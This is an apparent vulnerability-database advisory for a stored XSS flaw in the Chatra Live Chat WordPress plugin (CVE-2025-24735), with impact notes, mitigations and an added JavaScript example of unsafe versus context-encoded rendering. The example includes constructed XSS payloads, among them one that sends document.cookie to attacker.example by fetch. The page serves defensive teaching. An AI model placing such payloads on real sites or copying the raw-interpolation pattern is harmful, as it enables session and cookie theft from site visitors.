CVE-2025-24735: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Chatra Chatra Live Chat + ChatBot + Cart Saver
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chatra Chatra Live Chat + ChatBot + Cart Saver allows Stored XSS. This issue affects Chatra Live Chat + ChatBot + Cart Saver: from n/a through 1.0.11.
AI Analysis
Technical Summary
CVE-2025-24735 is a medium-severity stored cross-site scripting (XSS) vulnerability in Chatra Live Chat + ChatBot + Cart Saver, affecting all versions through 1.0.11. The root cause is CWE-79: user-supplied input is written into generated pages without adequate sanitization or output encoding, so an attacker who can save such input can plant script that persists on the server and runs in the browser of every user who later views the affected content. Script that runs this way executes with the victim's origin and session, so it can perform actions as the victim, read data the page exposes, exfiltrate cookies or tokens that are not protected by the HttpOnly flag, and serve as a foothold for further attacks. The CVSS 3.1 base score is 5.9 (medium): network attack vector and low attack complexity, but high privileges required and user interaction required, with changed scope (the injected script runs in other users' browsers, a security scope different from the vulnerable component). The high-privilege requirement means the attacker must already hold an account with elevated rights on the affected site, which narrows who can exploit the flaw; the realistic threats are a malicious or compromised privileged account, or a privileged user induced to save attacker-supplied content. No exploitation in the wild has been reported and no patch is linked on this page at the time of writing. The CVE was reserved in January 2025 and published in July 2025. Because the product embeds a customer-engagement widget into the pages visitors see, a successful injection can affect the confidentiality, integrity and availability of user sessions and data on the affected site.
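The encoding failure the summary describes, as an added example in Node.js JavaScript; this is not code from Chatra or from the advisory. The page does not say which field carries the injection, so three stored widget settings (title, color, greeting) saved by a high-privilege user are assumed, along with the three output contexts they land in: HTML text, a quoted attribute and an inline script. The hostname attacker.example, the cookie value and the payloads are all constructed for the example. The vulnerable renderer interpolates the settings raw; the hardened one encodes per context. Two small oracles then show the difference: a quote-aware tag tokenizer that lists event-handler attributes the template never emitted, and a stubbed execution of each inline script that records any outbound call a payload manages to make.

```javascript
// Added example, not code from the Chatra product or from the advisory page.
// The field behind CVE-2025-24735 is not named on the page; three stored widget
// settings saved by a high-privilege user are assumed, each reaching a different
// output context (HTML text, quoted attribute, inline script).

// Constructed stored settings, each carrying a payload suited to its context.
const storedSettings = {
  title: 'Support<img src=x onerror=alert(document.domain)>',
  color: 'red" onmouseover="alert(1)',
  greeting: '"};fetch("https://attacker.example/?c="+document.cookie);//',
};

// HTML text and quoted-attribute contexts: encode the five significant characters.
function escapeHtml(value) {
  const table = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => table[ch]);
}

// Inline-script context: HTML entities are not decoded inside <script>, so
// escapeHtml is the wrong tool. JSON-encode, then escape "<" and ">" so a value
// containing "</script>" cannot terminate the script element early.
function escapeJsValue(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// CWE-79 pattern: stored values interpolated raw into the generated page.
function renderVulnerable(s) {
  return [
    `<div class="chat-title">${s.title}</div>`,
    `<div class="chat-box" data-color="${s.color}"></div>`,
    `<script>window.ChatSetup = {greeting: "${s.greeting}"};</script>`,
  ].join('\n');
}

// Hardened: encode for the output context at the point of output, not on input.
function renderHardened(s) {
  return [
    `<div class="chat-title">${escapeHtml(s.title)}</div>`,
    `<div class="chat-box" data-color="${escapeHtml(s.color)}"></div>`,
    `<script>window.ChatSetup = {greeting: ${escapeJsValue(s.greeting)}};</script>`,
  ].join('\n');
}

// Minimal quote-aware tag tokenizer (enough for this example, not a full HTML
// parser): returns [{ name, attrs }] for every tag a browser would open.
function tokenizeTags(html) {
  const tags = [];
  let i = html.indexOf('<');
  while (i !== -1) {
    let j = i + 1;
    let quote = null;
    let text = '';
    for (; j < html.length; j++) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === '>') break;
      text += c;
    }
    const m = /^\/?([a-zA-Z][\w-]*)/.exec(text);
    if (m) {
      const attrRe = /([^\s="'<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
      const attrs = [...text.slice(m[0].length).matchAll(attrRe)].map((a) => a[1].toLowerCase());
      tags.push({ name: m[1].toLowerCase(), attrs });
    }
    i = html.indexOf('<', j + 1);
  }
  return tags;
}

// Oracle 1: event-handler attributes (on*) that the template itself never emits.
function findInjectedHandlers(html) {
  const found = [];
  for (const tag of tokenizeTags(html)) {
    for (const a of tag.attrs) if (a.startsWith('on')) found.push(`${tag.name}.${a}`);
  }
  return found;
}

// Oracle 2: run each inline script with stubbed window/document/fetch and record
// any outbound call an attacker-controlled value managed to trigger.
function runInlineScripts(html) {
  const calls = [];
  const errors = [];
  const fakeWindow = {};
  const fakeDocument = { cookie: 'session=constructed' }; // constructed value
  const fakeFetch = (url) => { calls.push(String(url)); };
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    try {
      new Function('window', 'document', 'fetch', m[1])(fakeWindow, fakeDocument, fakeFetch);
    } catch (e) {
      errors.push(String(e));
    }
  }
  return { calls, config: fakeWindow.ChatSetup, errors };
}
```

Running both oracles over renderVulnerable(storedSettings) reports an injected img.onerror and div.onmouseover handler and one recorded call to attacker.example carrying the stub cookie; over renderHardened(storedSettings) they report nothing, and window.ChatSetup.greeting round-trips to the original string. The inline-script case is the one most often mishandled: entities are not decoded inside <script>, so escapeHtml would corrupt legitimate values there and does nothing about JS-string escaping (backslashes, line terminators) or the </script> terminator; JSON encoding plus escaping of < and > is the right tool for that context.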
Potential Impact
For European organizations the impact is most relevant to e-commerce, customer-service and SaaS sites that use Chatra Live Chat + ChatBot + Cart Saver, since the widget is rendered into pages their customers and staff visit. A successful injection lets the attacker act within victims' sessions, read personal data visible in the page or reachable through the victim's session, and alter what users see, which can engage GDPR obligations on personal-data protection and breach notification, with the attendant regulatory fines, reputational damage and loss of customer trust. The same script position can be used to redirect users to phishing or malware pages. Because the CVSS vector requires high privileges and user interaction, the exploit path is not open to anonymous visitors: the realistic scenario is a malicious or compromised high-privilege account, or a privileged user tricked into saving attacker-supplied content, after which the stored script affects every visitor or staff member who views the page. Given Chatra's presence in European markets, organizations that rely on it for real-time customer engagement should treat that persistent, site-wide exposure as the main risk.
Mitigation Recommendations
1. Until a fixed version is available, restrict who can edit the product's settings and any other field in which Chatra accepts free text that ends up in page HTML. The CVSS vector requires high privileges, so reducing the number of accounts at that level, and enforcing multi-factor authentication on them, directly shrinks the set of possible attackers.
2. Deploy a Content Security Policy on pages that embed Chatra. To actually block injected inline script, the policy must avoid 'unsafe-inline' in script-src and use nonces or hashes for the legitimate inline snippets the site needs; a policy that only allowlists origins does not stop inline payloads. Roll it out in Content-Security-Policy-Report-Only mode first so the widget's own script sources are not broken.
3. Web application firewall rules can catch common XSS payloads, but treat them as a secondary control: the injection is made by an authenticated, privileged user, and encoded or context-specific payloads routinely evade signature matching.
4. Encode all stored data for the context in which it is output (HTML body, attribute, URL, inline script) rather than relying on input filtering alone, with particular attention to chat messages, chatbot inputs and widget settings.
5. Monitor logs for script-injection attempts and for configuration changes by privileged accounts; an unexpected edit to widget settings is the most direct indicator for this class of bug.
6. Apply the vendor's patch for CVE-2025-24735 as soon as one is published; none is linked on this page at the time of writing.
7. Educate users and administrators about the risks of clicking suspicious links or interacting with unexpected chat content.
8. Harden authentication and session management (HttpOnly and SameSite cookie attributes, short session lifetimes, re-authentication for sensitive actions) so that script running in a victim's browser gains as little as possible.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain, Poland
Technical Details
- Data Version: 5.1
- Assigner Short Name: Patchstack
- Date Reserved: 2025-01-23T14:52:51.691Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 686796cb6f40f0eb729fa548
Added to database: 7/4/2025, 8:54:35 AM
Last enriched: 7/14/2025, 9:29:15 PM
Last updated: 9/6/2025, 9:37:54 PM
Related Threats
- CVE-2025-10358: OS Command Injection in Wavlink WL-WN578W2 (Medium)
- CVE-2025-10340: Cross Site Scripting in WhatCD Gazelle (Medium)
- CVE-2025-10332: Cross Site Scripting in cdevroe unmark (Medium)
- CVE-2025-10331: Cross Site Scripting in cdevroe unmark (Medium)
- CVE-2025-10298 (Unknown)